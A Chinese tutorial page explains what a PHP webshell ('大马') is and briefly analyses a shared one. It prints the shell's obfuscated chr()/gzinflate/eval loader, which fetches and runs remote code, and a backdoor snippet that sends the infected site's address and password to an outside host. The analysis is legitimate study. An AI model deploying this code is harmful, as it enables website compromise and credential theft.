php大马是什么
php大马是什么
内容导读
收集整理的这篇技术教程文章主要介绍了php大马是什么,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1811字,纯文字阅读大概需要3分钟。
内容图文
大马:指木马病毒;php大马,就是php写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 (推荐学习:PHP视频教程)
<?php
$password='Shiqi';//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);$get=chr(102).chr(105).chr(108).chr(101).chr(95);$get.=chr(103).chr(101).chr(116).chr(95).chr(99);$get.=chr(111).chr(110).chr(116).chr(101).chr(110);$get.=chr(116).chr(115);$_SESSION['PhpCode']=$get($url);}$un=$c(103).$c(122).$c(105).$c(110);$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));@eval($un($_SESSION['PhpCode']));?>一共有三个变量,$url、$get、$un,首先对着几个变量ascii转成字符串,看看是什么,用echo输出即可。
就是个简单的基于base64加gzinflate加密
后门部分:
if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');
$url=$copyurl.$serveru.'&pass='.$serverp;
$url=urldecode($url);
GetHtml($url);}function geturl(){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('');
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
GetHtml($url);}以上就是php大马是什么的详细内容,更多请关注Gxl网其它相关文章!
内容总结
以上是为您收集整理的php大马是什么全部内容,希望文章能够帮你解决php大马是什么所遇到的程序开发问题。 如果觉得技术教程内容还不错,欢迎将网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
